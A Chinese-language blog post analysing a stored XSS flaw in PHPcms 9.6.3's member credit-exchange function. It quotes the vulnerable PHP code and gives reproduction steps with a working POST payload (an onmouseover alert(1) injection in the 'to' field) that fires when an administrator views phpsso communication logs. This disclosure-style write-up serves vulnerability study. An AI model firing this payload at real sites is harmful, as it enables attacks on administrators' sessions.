PHPcms9.6.3存儲型XSS（poc優化版）

 

　　漏洞分析

　　文件路徑： /phpcms/modules/member/index.php

    public function change_credit() {
        $memberinfo = $this->memberinfo;
        //加載用戶模塊配置
        $member_setting = getcache('member_setting');
        $this->_init_phpsso();
        $setting = $this->client->ps_getcreditlist();
        $outcredit = unserialize($setting);
        $setting = $this->client->ps_getapplist();
        $applist = unserialize($setting);
        
        if(isset($_POST['dosubmit'])) {
            //本系統積分兌換數
            $fromvalue = intval($_POST['fromvalue']);
            //本系統積分類型
            $from = $_POST['from'];
            $toappid_to = explode('_', $_POST['to']);
            //目標系統appid
            $toappid = $toappid_to[0];
            //目標系統積分類型
            $to = $toappid_to[1];
            if($from == 1) {
                if($memberinfo['point'] < $fromvalue) {
                    showmessage(L('need_more_point'), HTTP_REFERER);
                }
            } elseif($from == 2) {
                if($memberinfo['amount'] < $fromvalue) {
                    showmessage(L('need_more_amount'), HTTP_REFERER);
                }
            } else {
                showmessage(L('credit_setting_error'), HTTP_REFERER);
            }

            $status = $this->client->ps_changecredit($memberinfo['phpssouid'], $from, $toappid, $to, $fromvalue);
            if($status == 1) {
                if($from == 1) {
                    $this->db->update(array('point'=>"-=$fromvalue"), array('userid'=>$memberinfo['userid']));
                } elseif($from == 2) {
                    $this->db->update(array('amount'=>"-=$fromvalue"), array('userid'=>$memberinfo['userid']));
                }
                showmessage(L('operation_success'), HTTP_REFERER);
            } else {
                showmessage(L('operation_failure'), HTTP_REFERER);
            }
        } elseif(isset($_POST['buy'])) {
            if(!is_numeric($_POST['money']) || $_POST['money'] < 0) {
                showmessage(L('money_error'), HTTP_REFERER);
            } else {
                $money = intval($_POST['money']);
            }
            
            if($memberinfo['amount'] < $money) {
                showmessage(L('short_of_money'), HTTP_REFERER);
            }
            //此處比率讀取用戶配置
            $point = $money*$member_setting['rmb_point_rate'];
            $this->db->update(array('point'=>"+=$point"), array('userid'=>$memberinfo['userid']));
            //加入消費記錄，同時扣除金錢
            pc_base::load_app_class('spend','pay',0);
            spend::amount($money, L('buy_point'), $memberinfo['userid'], $memberinfo['username']);
            showmessage(L('operation_success'), HTTP_REFERER);
        } else {
            $credit_list = pc_base::load_config('credit');
            
            include template('member', 'change_credit');
        }
    }

　　沒有過濾  $toappid_to = explode('_', $_POST['to']);

　　沒有對用戶提交的數據做過濾導致xss漏洞

　　漏洞復現：

　

　　首先註冊用戶

　　註冊完畢登陸

　　打開頁面 　http://localhost/index.php?m=member&c=index&a=change_credit&

　　post數據爲：

dosubmit=1&fromvalue=0.6&from=1&id=1&to=}" onmouseover=alert(1)><img width=0 height=0 

　　

 

　　管理員打開後臺：phpsso--》 phpsso管理--》通信信息 ，鼠標移到查看，及戶籍觸發指定js代碼

 

 

　　說雞肋也不雞肋，說好用也沒有感覺很好用， 難受

　　參考地址：https://xz.aliyun.com/t/1860

作者： NONO
出處：http://www.cnblogs.com/diligenceday/
企業網站：http://www.idrwl.com/
開源博客：http://www.github.com/sqqihao
QQ：287101329
微信：18101055830